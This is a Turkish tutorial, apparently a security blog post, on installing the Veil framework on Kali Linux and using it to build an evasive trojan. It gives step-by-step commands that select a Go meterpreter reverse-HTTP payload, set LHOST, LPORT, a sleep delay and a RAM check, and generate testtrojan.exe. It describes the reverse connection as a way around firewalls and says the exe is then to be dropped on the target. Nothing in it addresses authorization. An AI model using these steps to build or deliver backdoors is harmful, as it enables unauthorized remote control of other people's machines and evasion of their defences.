Veil sızma testlerinde kullanılan bizlere Trojan oluşturmamıza olanak sağlayan. Trojan’i oluştururken Truva Atı virüsünü kullanır ve hedef sisteme atıldığında Backdoor oluşturur. Bu Trojan ile hedef makineye bağlanmak yerine, hedef makine’yi kendimize bağlamış oluruz. Böylelikle ortadan Firewall gibi koruma sistemlerini ortadan kaldırmış oluruz, çünkü güvenlik duvarları dışarıdan gelen tehditlere karşı önlem alabilir ama bizim amacımız hedef makineyi kendimize bağlamak olduğundan güvenlik duvarı bizi engelleyemeyecektir.
Truva Atı Virüsü Nedir?
Bu virüs adını antik hikaye’den gelen Truva atından almıştır. Virüs içinde zararlı yazılım barındıran fakat karşı sisteme atıldığında zararsız gibi görünmektedir. Hedef sistem bu virüsü çalıştırdığı zaman bize arka kapı açmaktadır ve hedef sistem, sizlerin bilgisiyarına bağlanacaktır.
Veil Kurulumu
Kali linux işletim sisteminizi açtıktan sonra terminal ekranını açın. Biz örneğimizde Root kullanıcı olarak işlemlere devam edeceğiz eğer Root kullanıcısı değilseniz “sudo su” komutunu kullanıp Root kullanıcısına geçebilirsiniz. Eğer klavyeniz Türkçe değilse “setxkbmap tr” yazarak Türkçe klavyeye geçebilirsiniz.
Root kullanıcısı değilseniz:
- sudo su
- kali’ye giriş yaptığınız kali şifreniz
- ek olarak klavyeniz için setxkmap tr yazarak Türkçe klavyeye geçebilirsiniz.
Root kullanıcısı iseniz:
- setxkmap tr komutunu kullanarak Türkçe klavyeye geçebilirsiniz.
Root kullanıcısı olup klavyemizi Türkçe yaptık şimdi programın kurulum aşamasına geçelim.
Bunun için kullanacağımız komut:
- apt-get install veil -y : sonuna y yazmamızın sebebi yükleme esnasında gelecek olan evet/hayır sorularının tümüne evet demek anlamına gelmektedir.
Programınız sorunsuz şekilde indikten sonra terminalinizi açın ve veil yazıp enter’a basın.
Yukarıdaki fotoğrafta yeşil renk ile belirttiğimiz bölümde indirme işlemleri devam edilsin diye bir soru ile karşılaşırsanız “y” harfini yazıp enter’a basarsanız veil programı kendini güncelleyecektir.
Veil kendi içinde ki araçlardan dolayı kullanmakta olduğu programları yüklemek isteyecektir karşınıza gelen ekrandaki seçeneklere next diyerek devam edebilirsiniz.
Bizimle beraber adımları yaptığınızda Python kurulumunuz bitmiş olacaktır. Şimdi bizimle beraber diğer adımları takip edip gerekli programları kurabilirsiniz.
Veil için gerekli olan tüm programlar artık Kali işletim sisteminizin içerisine kurulmuş olacaktır. Şimdi yapmanız gereken adım terminali açıp veil yazıp enter’a basmak olacaktır.
Eğer böyle bir hata alırsanız bunun sebebi sisteminizde eksik dosyaların bulunmasından kaynaklıdır. Bu hatayı çözüme kavuşturmak için:
- Run: /usr/share/veil/config/setup.sh –force –silent yazabilirsiniz.
Bu komut sisteminizin eksik dosyalarını yükleyecektir.
Veil Kullanımı
Veil aracını çalıştırmak için biz bu örneğimizde Root kullanıcısı olduk eğer sizde Root kullanıcısı olarak çalıştırmak isterseniz:
Root kullanıcısı değilseniz:
- sudo su yazıp kali işletim sistemine giriş yaptığınız şifre ile Root kullanıcısına geçebilirsiniz.
- veil yazıp enter’a basarabilirsiniz.
Root kullanıcısı iseniz:
- veil yazıp enter’a basabilirsiniz.
Bizi böyle bir arayüz karşılayacaktır sizlere bu ekranda yazılmış olan seçeneklerin ne anlama geldiğini açıklamakla veil kullanımına devam edelim:
- Available tools: Güncel olarak iki adet aracın veil içinde olduğunu bizlere belirtmektedir.
- use: Bir işlem seçerken kullanılmaktadır.
- update: Araçların güncellenmesi için kullanılır.
- options: Ayarlar kısmını gösteren bölümdür.
- list: Kullanılabilir araçları bizlere listeler.
- info: Belirli bir araçla ilgili detaylı bilgi almaya olanak sağlar.
- exit: Veil programın dan çıkmayı sağlar.
Veil’i kullanmadan önce size tavsiyemiz Veil’i bir kere güncellemek olacaktır bunun için Veil>: kısmına
- update yazmanız sistemde kullanılan araçların veya yeni eklenmiş olan Trojanların sisteme eklenmesine olanak sağlayacaktır.
List diyerek Veil içerisinde hangi araçlar var görebilmek için list yazmanız yeterli olacaktır. Use komutu ile listelenmiş güncel araçlar içerisinden istediğiniz bir seçeneği seçebilirsiniz. Bu örneğimizde biz 1 numaralı seçeneğimizi seçeceğiz.
Gördüğünüz gibi use 1 komutunu yazarak Available Tools kısmında Evasion seçeneğini seçmiş bulunuyoruz.
Use 1 komutunu kullandıktan sonra Veil bize 41 adet payloads yüklü olduğunu söylemektedir. List komutunu kullanarak 41 adet payloads önümüze gelecektir.
Görüldüğü üzere list komutu ile farklı dillerde yazılmış birden fazla backdoor’u görebilmekteyiz. Biz örneğimizde 14 numarada bulunan go/meterpreter/rev_http.py kullanacağız. Siz isterseniz farklı bir tanesini seçebilirsiniz.
use 14 komutunu yazdıktan sonra karşımıza gelen ekran böyle olacaktır. Siz farklı bir komut kullandığınızda da karşınıza buna benzer bir ekran gelecektir. Burada önemli olan gerekli ayarlamaları yapmaktır ayarlara geçmeden buradaki komutları sizlere açıklamak isteriz:
- back: Veil-Evasion kısmına geri dönecektir.
- exit: Veil’den tamamen çıkmaya yarayan komuttur. Bu komutu yazdığınızda Veil kapanacaktır.
- generate: Gerekli ayarlamaları yaptıktan sonra Trojan’ı oluşturmak amacıyla kullanılan komuttur.
- options: Ayarlar kısmını bizlere açar.
- set: Bir fonksiyon ayarlanırken kullanılır.
Trojan oluşturmak için:
- set LHOST (Kullandığınız işletim sisteminin bizim örneğimizde Kali’dir. IP adresini yazmanız gerekmektedir bunun için ifconfig yazabilirsiniz.)
- set LPORT 8080 (Biz örneğimizde 8080 portunu kullandık isterseniz siz başka bir port numarası da kullanabilirsiniz, önemli olan nokta kullanmak istediğiniz portun başka bir cihaz tarafından kullanılmaması gerekmektedir.)
- set SLEEP 4 (Oluşturduğumuz Trojan yolladığınız hedef makina da kaç saniye sonra aktif olsun bunu belirlediğimiz kısımdır biz örneğimizde 4 saniye sonra aktif olmasını istedik.)
- set RAMCHECK true (En az 3GB ram olup olmadığını kontrol eden kısımdır.)
- generate yazıp enter’a basarsanız artık Trojan oluşturulmaya başlanacaktır.
generate komutundan sonra size Trojan için isim soracaktır istediğiniz ismi verebilirsiniz biz örneğimizde “testtrojan” dedik.
Gördüğünüz gibi Trojan başarıyla oluşturuldu ve kurulu olduğu dizin bize gösterilmektedir. Bu örneğimizde ki dizin /var/lib/output/compiled/testtrojan.exe’dir.
Gördüğünüz gibi testtrojan adlı Trojan’ımız oluşturulmuş bundan sonra yapmanız gereken bu exe dosyasını hedef sisteme atmak olacaktır.
Bu makalemizi beğendiyseniz sizleri Metasploit Genel Komut Ve Kavramlar adlı makalemize bekleriz: https://www.ozztech.net/siber-guvenlik/metasploit-genel-komut-ve-kavramlar/
Ayrıca sizleri siber güvenlik için videolar çektiğimiz Youtube kanalımıza bekleriz: https://www.youtube.com/channel/UCHamQAQ_Vvku0wRkueRwiWw/videos